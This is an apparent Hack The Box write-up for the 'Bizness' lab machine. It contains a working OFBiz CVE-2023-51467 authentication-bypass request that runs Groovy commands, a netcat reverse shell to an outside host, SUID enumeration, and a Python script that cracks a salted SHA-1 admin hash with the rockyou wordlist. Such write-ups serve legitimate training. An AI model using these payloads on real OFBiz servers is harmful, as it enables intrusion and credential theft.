HTB-Bizness

Information Gather（Recon）

Nmap Port scan

Web dir scan:

Get OFBiz admin login page:

Do vuln scan about OFBiz:

https://github.com/vulhub/vulhub/blob/master/ofbiz/CVE-2023-51467/README.zh-cn.md

Foothold(Exploitation)

Let's EXP CVE-2023-51467

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: bizness.htb
Cookie: JSESSIONID=8AC4B08D68313C981978DE0F082FCACD.jvm1; JSESSIONID=8369C1B988BF78F203DE049370E2EB27.jvm1; OFBiz.Visitor=10603
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigater
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

groovyProgram=throw+new+Exception("cat /home/ofbiz/user.txt".execute().text);

b2d6b85de160684e0d66f5d5b2fe32fb

Privilege Escalation

Firstly,Get a reverse shell will be convenient.

https://weibell.github.io/reverse-shell-generator/

nc -e /bin/sh 10.10.16.15 6666
nc -l 6666

Do some recon about the linux:

uname -a
Linux bizness 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64 GNU/Linux

Find SUID file

find / -perm /4000 -type f
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

su,sudo need password

pwd
/opt/ofbiz/framework/resources/templates
ls
AdminNewTenantData-Derby.xml
AdminNewTenantData-MySQL.xml
AdminNewTenantData-Oracle.xml
AdminNewTenantData-PostgreSQL.xml
AdminUserLoginData.xml
build.gradle
CommonScreens.xml
controller.xml
DemoData.xml
document.xml
entitymodel.xml
Forms.xml
HELP.xml
index.jsp
Menus.xml
ofbiz-component.xml
README.txt
Screens.xml
SecurityGroupDemoData.xml
SecurityPermissionSeedData.xml
services.xml
Tests.xml
TypeData.xml
UiLabels.xml
web.xml

cat AdminUserLoginData.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements.  See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.  The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License.  You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied.  See the License for the
specific language governing permissions and limitations
under the License.
-->

<entity-engine-xml>
    <UserLogin userLoginId="@userLoginId@" currentPassword="{SHA}47ca69ebb4bdc9ae0adec130880165d2cc05db1a" requirePasswordChange="Y"/>
    <UserLoginSecurityGroup groupId="SUPER" userLoginId="@userLoginId@" fromDate="2001-01-01 12:00:00.0"/>
</entity-engine-xml>

{SHA}47ca69ebb4bdc9ae0adec130880165d2cc05db1a

/opt/ofbiz/runtime/data/derby/ofbiz/seg0

THe $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN defines the SHA which means it uses “SHA-1” hashing algorithm and “d” for salt and “uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN” remaining the value.

import hashlib
import base64
import os
from tqdm import tqdm

class PasswordEncryptor:
    def __init__(self, hash_type="SHA", pbkdf2_iterations=10000):
        """
        Initialize the PasswordEncryptor object with a hash type and PBKDF2 iterations.

        :param hash_type: The hash algorithm to use (default is SHA).
        :param pbkdf2_iterations: The number of iterations for PBKDF2 (default is 10000).
        """
        self.hash_type = hash_type
        self.pbkdf2_iterations = pbkdf2_iterations

    def crypt_bytes(self, salt, value):
        """
        Crypt a password using the specified hash type and salt.

        :param salt: The salt used in the encryption.
        :param value: The password value to be encrypted.
        :return: The encrypted password string.
        """
        if not salt:
            salt = base64.urlsafe_b64encode(os.urandom(16)).decode('utf-8')
        hash_obj = hashlib.new(self.hash_type)
        hash_obj.update(salt.encode('utf-8'))
        hash_obj.update(value)
        hashed_bytes = hash_obj.digest()
        result = f"${self.hash_type}${salt}${base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')}"
        return result

    def get_crypted_bytes(self, salt, value):
        """
        Get the encrypted bytes for a password.

        :param salt: The salt used in the encryption.
        :param value: The password value to get encrypted bytes for.
        :return: The encrypted bytes as a string.
        """
        try:
            hash_obj = hashlib.new(self.hash_type)
            hash_obj.update(salt.encode('utf-8'))
            hash_obj.update(value)
            hashed_bytes = hash_obj.digest()
            return base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')
        except hashlib.NoSuchAlgorithmException as e:
            raise Exception(f"Error while computing hash of type {self.hash_type}: {e}")

# Example usage:
hash_type = "SHA1"
salt = "d"
search = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I="
wordlist = '/usr/wordlist/rockyou.txt'

# Create an instance of the PasswordEncryptor class
encryptor = PasswordEncryptor(hash_type)

# Get the number of lines in the wordlist for the loading bar
total_lines = sum(1 for _ in open(wordlist, 'r', encoding='latin-1'))

# Iterate through the wordlist with a loading bar and check for a matching password
with open(wordlist, 'r', encoding='latin-1') as password_list:
    for password in tqdm(password_list, total=total_lines, desc="Processing"):
        value = password.strip()

        # Get the encrypted password
        hashed_password = encryptor.crypt_bytes(salt, value.encode('utf-8'))

        # Compare with the search hash
        if hashed_password == search:
            print(f'Found Password:{value}, hash:{hashed_password}')
            break  # Stop the loop if a match is found

monkeybizness

Summary

• Derby database

• OFBiz Exploits Reproducing

• OFBiz Basic

Reference

https://medium.com/@aayushpantha97/bizness-walkthrough-hackthebox-d75eab167006

https://medium.com/@karimwalid/hack-the-box-bizness-walkthrough-3e19aab509d2

原文始发于微信公众号（红蓝安全）：HTB-Bizness